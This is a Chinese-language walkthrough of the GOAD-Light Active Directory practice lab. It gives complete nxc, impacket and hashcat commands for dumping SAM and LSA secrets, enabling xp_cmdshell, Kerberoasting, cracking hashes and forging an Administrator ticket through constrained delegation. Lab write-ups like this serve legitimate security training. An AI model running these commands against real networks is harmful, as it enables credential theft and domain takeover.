SMB 192.168.56.22 445 CASTELBLACK NORTH\robb.stark logon_server: WINTERFELL

SMB 192.168.56.22 445 CASTELBLACK NORTH\sql_svc logon_server: WINTERFELL

robb.stark和sql_svc在线

枚举域用户，查找与 #T.L. 线索对应的候选用户名。

这里还泄露出一个 samwell.tarly / Heartsbane 组合，先记下来，后面可以用于进一步验证和横向枚举。

nxc smb 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u ‘jeor.mormont’ -p ‘_L0ngCl@w_’ \
  –sam

读取这个192.168.56.22的SAM数据库

nxc smb 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u ‘jeor.mormont’ -p ‘_L0ngCl@w_’ \
  –lsa

读取192.168.56.22的LSA secrets，可能会包含明文账密

在 north.sevenkingdoms.local 域内暴露了数据库服务账号 sql_svc 的密码：YouWillNotKerboroast1ngMeeeeee。

MSSQL 与服务账号 sql_svc

先验证它在三台 SMB 上的权限：

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \-d north.sevenkingdoms.local \-u ‘sql_svc’ -p ‘YouWillNotKerboroast1ngMeeeeee’

然后测 MSSQL 登录：

nxc mssql 192.168.56.22 \-d north.sevenkingdoms.local \-u ‘sql_svc’ -p ‘YouWillNotKerboroast1ngMeeeeee’

接着查它在 SQL Server 里的权限：

nxc mssql 192.168.56.22 \-d north.sevenkingdoms.local \-u ‘sql_svc’ -p ‘YouWillNotKerboroast1ngMeeeeee’ \-q “SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(‘sysadmin’);”

最后一条SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(‘sysadmin’);

输出的是1，说明sql_svc是SQL Server的sysadmin

下一步启用并测试 xp_cmdshell：

nxc mssql 192.168.56.22 \-d north.sevenkingdoms.local \-u ‘sql_svc’ -p ‘YouWillNotKerboroast1ngMeeeeee’ \-q “EXEC sp_configure ‘show advanced options’,1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’,1; RECONFIGURE;”

然后执行系统命令，确认 SQL 命令执行身份：

nxc mssql 192.168.56.22 \-d north.sevenkingdoms.local \-u ‘sql_svc’ -p ‘YouWillNotKerboroast1ngMeeeeee’ \-x ‘whoami && hostname’

再看权限：

nxc mssql 192.168.56.22 \-d north.sevenkingdoms.local \-u ‘sql_svc’ -p ‘YouWillNotKerboroast1ngMeeeeee’ \-x ‘whoami /priv’

通过 xp_cmdshell 执行系统命令时，当前身份是 north\sql_svc，且该账号具备 SeImpersonatePrivilege。

父域凭据落地与 BloodHound

注意父域里有两个符合 secret.ps1 中 #T.L. 线索的候选用户：tywin.lannister 和 tyron.lannister。

两个都试一次

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \

 -d sevenkingdoms.local \

 -u ‘tywin.lannister’ -p ‘powerkingftw135’

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \

 -d sevenkingdoms.local \

 -u ‘tyron.lannister’ -p ‘powerkingftw135’

tywin.lannister可以而且10.11.22都可以登录

先把 sevenkingdoms.local 这份 zip 导进 BloodHound Legacy，然后重点看这几个查询：

bloodhound-python \

 -u ‘jeor.mormont’ -p ‘_L0ngCl@w_’ \

 -d ‘north.sevenkingdoms.local’ -ns 192.168.56.11 \

 -c All –zip

Kerberoasting 与委派利用

Kerberoasting

用已拿到的域账号向域控枚举带 SPN 的服务账号，并把它们的 Kerberos 服务票据抓下来，供后续离线破解密码。

impacket-GetUserSPNs sevenkingdoms.local/tywin.lannister:powerkingftw135 \ -dc-ip 192.168.56.10 -request 子域这条也是一样： impacket-GetUserSPNs

north.sevenkingdoms.local/jeor.mormont:_L0ngCl@w_ \ -dc-ip 192.168.56.11 -request

父域没有可用的SPN账号，子域抓到了sansa.stark、jon.snow、sql_svc，并输出三段hash

sql_svc 的密码已经知道了，不用再 crack；把 sansa.stark 和 jon.snow 那两条 $krb5tgs$23$… 哈希保存到一个文件里，再用 hashcat 跑。

hashcat -m 13100 hashpatch.txt /usr/share/wordlists/rockyou.txt

最终爆破出 jon.snow 的密码是 iknownothing。

委派利用与阶段结论

用新账密验证

impacket-findDelegation north.sevenkingdoms.local/jon.snow:iknownothing \

 -dc-ip 192.168.56.11查看jon.snow是否被允许“代替别人”访问哪些服务

impacket-getST -spn cifs/winterfell.north.sevenkingdoms.local \

 -impersonate Administrator \

 north.sevenkingdoms.local/jon.snow:iknownothing \

 -dc-ip 192.168.56.11

jon.snow 有 Constrained w/ Protocol Transition

它被允许委派到 CIFS/winterfell.north.sevenkingdoms.local

在第二句的getST

这说明我们已经成功伪造出 Administrator 访问 CIFS/winterfell.north.sevenkingdoms.local 的服务票据。

更准确地说，这一步已经证明了 north.sevenkingdoms.local 子域中的高权限路径被打通。

官方没有明确说明这一步已经等于父域控制或整片林控制，所以这篇 GOAD-Light 复现先收在这里。